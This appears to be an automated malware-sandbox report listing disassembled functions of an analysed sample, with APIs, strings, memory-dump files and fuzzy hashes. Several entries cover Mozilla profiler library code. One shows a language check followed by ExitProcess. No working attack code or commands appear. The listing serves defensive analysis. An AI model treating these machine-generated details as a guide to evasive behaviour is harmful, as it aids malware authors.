Instruction Fuzzy Hash: EC51C071E05694DBDB00DF68C8457EEB7B0FF4A318F44842DE8556BB90EB31A948C7A2

Function 6CBD9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CBCAB89: EnterCriticalSection.KERNEL32(6CC1E370,?,?,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284), ref: 6CBCAB94
Part of subcall function 6CBCAB89: LeaveCriticalSection.KERNEL32(6CC1E370,?,6CB934DE,6CC1F6CC,?,?,?,?,?,?,?,6CB93284,?,?,6CBB56F6), ref: 6CBCABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBA4A68), ref: 6CBD945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBD9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBD9482
__Init_thread_footer.LIBCMT ref: 6CBD949F

Strings

MOZ_BASE_PROFILER_LOGGING, xrefs: 6CBD947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CBD9459
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CBD946B

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 82b9f2ed54ca777f4793b98f6a2a3f27f0b2d2d4bcbb21002ac18154ec05fa4d
Instruction ID: 51505ab8168495241199412ac115f65da6a339961cb9981f1d118a2923871a2d
Opcode Fuzzy Hash: 82b9f2ed54ca777f4793b98f6a2a3f27f0b2d2d4bcbb21002ac18154ec05fa4d
Instruction Fuzzy Hash: D6012830E041408FE710DB9FE822A493374FB0532DF054537F80687F42EA25E5558D9B

Function 00776770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 00776774
ExitProcess.KERNEL32 ref: 007767A5
ExitProcess.KERNEL32 ref: 007767AF
ExitProcess.KERNEL32 ref: 007767B9
ExitProcess.KERNEL32 ref: 007767C3
ExitProcess.KERNEL32 ref: 007767CD

Strings

*, xrefs: 0077678C

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 4db5d5aca448e686ccb8e7adc68cfd06dba55b16b8a3da9b755673ef263b8b5b
Instruction ID: 79ae25578c1e13c045d6ded9a27a07268f26e6f438761768127148cd311f785f
Opcode Fuzzy Hash: 4db5d5aca448e686ccb8e7adc68cfd06dba55b16b8a3da9b755673ef263b8b5b
Instruction Fuzzy Hash: C3F01730918209EBD7849FE0E909B6D7A70FB06742F044198E60986290D7784E51EBD6

Function 6CC0B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CC0B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC0B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC0B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC0B5F4
__Init_thread_footer.LIBCMT ref: 6CC0B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CC0B61F
std::_Facet_Register.LIBCPMT ref: 6CC0B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0B655

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: d7808b37bf9a26a1d50008691f9e8b30b0c1b9235f079166c1b9e6017dfedd8c
Instruction ID: 65cf146c9c0ab43608ab170b0f85a2738a65ec9560c20281b355cc293258cdd2
Opcode Fuzzy Hash: d7808b37bf9a26a1d50008691f9e8b30b0c1b9235f079166c1b9e6017dfedd8c
Instruction Fuzzy Hash: 6331C7B1B00105CFCF04EF6AC86A9AEB7B5FF8A324F140599D90697B40DB31A806CF91

Function 6CBD84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD85AC

Part of subcall function 6CBD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CBD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD767F
Part of subcall function 6CBD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CBD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD7693
Part of subcall function 6CBD7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CBD85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CBD85B2

Part of subcall function 6CBB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CBB5EDB
Part of subcall function 6CBB5E90: memset.VCRUNTIME140(6CBF7765,000000E5,55CCCCCC), ref: 6CBB5F27
Part of subcall function 6CBB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CBB5FB2

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 0cc30c35ef81179ead3bf24e19a73ee30f1e410d8baa3683e4899d8b8c6e3b0b
Instruction ID: cde588b6878a855b8bc3ab6973643684a2bddfcabb1585ed7b680a29f184653c
Opcode Fuzzy Hash: 0cc30c35ef81179ead3bf24e19a73ee30f1e410d8baa3683e4899d8b8c6e3b0b
Instruction Fuzzy Hash: 1F21B2742006419FDB14DB29C888A6AB7B5FF4430EF15082EE55BC3B41DB32F949CB92

Function 6CBDF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBCCBE8: GetCurrentProcess.KERNEL32(?,6CB931A7), ref: 6CBCCBF1
Part of subcall function 6CBCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CB931A7), ref: 6CBCCBFA

Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBA4A68), ref: 6CBD945E
Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CBD9470
Part of subcall function 6CBD9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CBD9482
Part of subcall function 6CBD9420: __Init_thread_footer.LIBCMT ref: 6CBD949F

GetCurrentThreadId.KERNEL32 ref: 6CBDF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CBDF598), ref: 6CBDF621

Part of subcall function 6CBD94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CBD94EE
Part of subcall function 6CBD94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CBD9508

GetCurrentThreadId.KERNEL32 ref: 6CBDF637
AcquireSRWLockExclusive.KERNEL32(6CC1F4B8,?,?,00000000,?,6CBDF598), ref: 6CBDF645
ReleaseSRWLockExclusive.KERNEL32(6CC1F4B8,?,?,00000000,?,6CBDF598), ref: 6CBDF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CBDF62A

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: a0586325a15396b9725169afc9d1c919fc047c49c5613a43794d206dd91255ec
Instruction ID: 896865920a51b268c9eea2bce8d5621b94f778c10a00acc6d72d77adf9d67d69
Opcode Fuzzy Hash: a0586325a15396b9725169afc9d1c919fc047c49c5613a43794d206dd91255ec
Instruction Fuzzy Hash: FA11E375204244AFDA04AF5BC8599A9BBB9FF8679CB110055FA0583F01CB71BC21CFA1

Function 007792E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:w,80000000,00000003,00000000,00000003,00000080,00000000,?,00773AEE,?), ref: 007792FC
GetFileSizeEx.KERNEL32(000000FF,:w), ref: 00779319
CloseHandle.KERNEL32(000000FF), ref: 00779327

Strings

:w, xrefs: 007792F8, 007792FB
:w, xrefs: 00779311, 0077933D, 00779314

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :w$:w
API String ID: 1378416451-1907928740
Opcode ID: 50c6b0559b59497fc0744a2862a3dbeef0d6c4d4caf53130f7539dc8427c9d4f
Instruction ID: 2b2909a04fde8cc90d7e2903d41702af1ac12e3d64eb448e5894819211400581
Opcode Fuzzy Hash: 50c6b0559b59497fc0744a2862a3dbeef0d6c4d4caf53130f7539dc8427c9d4f
Instruction Fuzzy Hash: 28F08734E44208BBDF10DBB0DC08BAE77B9AB483A0F10C254BA15A72C0D678AA00DB80

Function 6CBD05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CBCCFAE,?,?,?,6CB931A7), ref: 6CBD05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CBCCFAE,?,?,?,6CB931A7), ref: 6CBD0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CB931A7), ref: 6CBD061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CB931A7), ref: 6CBD0627

Strings

<jemalloc>, xrefs: 6CBD05FA, 6CBD060F
: (malloc) Error in VirtualFree(), xrefs: 6CBD061B, 6CBD0625

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: a703875bcf77141a7a8d45103edf2a8194ecd062c5dad5ed7d08d85f027bc79d
Instruction ID: c9ac4fbddee25e6749d65dee96e0643fcae0830e41e43ca7f4b8c3c190c4f285
Opcode Fuzzy Hash: a703875bcf77141a7a8d45103edf2a8194ecd062c5dad5ed7d08d85f027bc79d
Instruction Fuzzy Hash: ECE08CE2A1501037F5142256AC86EFB761CDBC6134F080039FD0D82301F94BAD1A55F7

Function 6CBA05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3303dc65149d6bf5d16f8e2ac386480df0ca04d52c6edc030e9abf50b961c211
Instruction ID: b3f40a056a6f203f8dc3d9f9f8b77c27e137e959a65dc862dd317be0267ea1a9
Opcode Fuzzy Hash: 3303dc65149d6bf5d16f8e2ac386480df0ca04d52c6edc030e9abf50b961c211
Instruction Fuzzy Hash: 60A158B0A046858FDB14CF69D584A9AFBF1FF49304F44866ED48A97B01E730A946CFA1

Function 6CBF14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBF14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CBF14E2
GetCurrentThreadId.KERNEL32 ref: 6CBF1546
InitializeConditionVariable.KERNEL32(?), ref: 6CBF15BA
free.MOZGLUE(?), ref: 6CBF16B4

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: a2682308fc079732082395c051a0b89f2dec18e7b38b111097b3809cf24b98dd
Instruction ID: 2342ecae70716370b52984f8b5ad8e13efe7f151e88bafd8501eda2a30a741aa
Opcode Fuzzy Hash: a2682308fc079732082395c051a0b89f2dec18e7b38b111097b3809cf24b98dd
Instruction Fuzzy Hash: FF61E2B1A007849BDB118F25C880BDEB7B5FF89308F04891DED9A57701DB31E949CB92

Function 6CBEDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CBEDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CBED38A,?), ref: 6CBEDC6F
free.MOZGLUE(?,?,?,?,?,6CBED38A,?), ref: 6CBEDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CBED38A,?), ref: 6CBEDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CBED38A,?), ref: 6CBEDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CBED38A,?), ref: 6CBEDD4A

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 9d6a5ee97a061a8f03d2ddb7d6207eebb775b9c35e3599cca8154c168a5aca0e
Instruction ID: 38def772a1e15c4414c30bc1d9044779c0657d3c852c45ac5628f5b7342d5fcb
Opcode Fuzzy Hash: 9d6a5ee97a061a8f03d2ddb7d6207eebb775b9c35e3599cca8154c168a5aca0e
Instruction Fuzzy Hash: 424136B5A00215CFCB00CFA9D8809AAB7F6FF8C354B554569E945ABB11DB71FC04CB91

Function 6CBD6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CBCFA80: GetCurrentThreadId.KERNEL32 ref: 6CBCFA8D
Part of subcall function 6CBCFA80: AcquireSRWLockExclusive.KERNEL32(6CC1F448), ref: 6CBCFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CBD6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CBD67C8

Part of subcall function 6CBE4290: memcpy.VCRUNTIME140(?,?,6CBF2003,6CBF0AD9,?,6CBF0AD9,00000000,?,6CBF0AD9,?,00000004,?,6CBF1A62,?,6CBF2003,?), ref: 6CBE42C4

Strings

data, xrefs: 6CBD6593

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: b0435d863ad913757b9b8bb355735c69bd5673f016b04dd8384115affba5efb4
Instruction ID: fa0a7139d31b22c4c8e0eb49a9cc78450caf65ece73ee02adbd6212a4f6d8d3d
Opcode Fuzzy Hash: b0435d863ad913757b9b8bb355735c69bd5673f016b04dd8384115affba5efb4
Instruction Fuzzy Hash: 75D1CB75A083808FD724CF69C851B9EB7F5AFD5308F11492EE48987B91EB31A849CB53

Function 6CBCD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CB9EB57,?,?,?,?,?,?,?,?,?), ref: 6CBCD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB9EB57,?), ref: 6CBCD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB9EB57,?), ref: 6CBCD673
free.MOZGLUE(?), ref: 6CBCD888

Strings

|Enabled, xrefs: 6CBCD81E

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: aaea1623aad5f9b64cd8bb10a40151e831c6a25acce2e7a1ac3509a98bdb0738
Instruction ID: 6a177ed9dfb5456098e0931502a6f6a61c4b5dd6b22373498140f45a13626b8c
Opcode Fuzzy Hash: aaea1623aad5f9b64cd8bb10a40151e831c6a25acce2e7a1ac3509a98bdb0738
Instruction Fuzzy Hash: 6DA1C0B4B042848FDB01CF69D4907AEBBF1EF49318F14806DD899ABB41D731A945CBA2

Function 6CBCF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

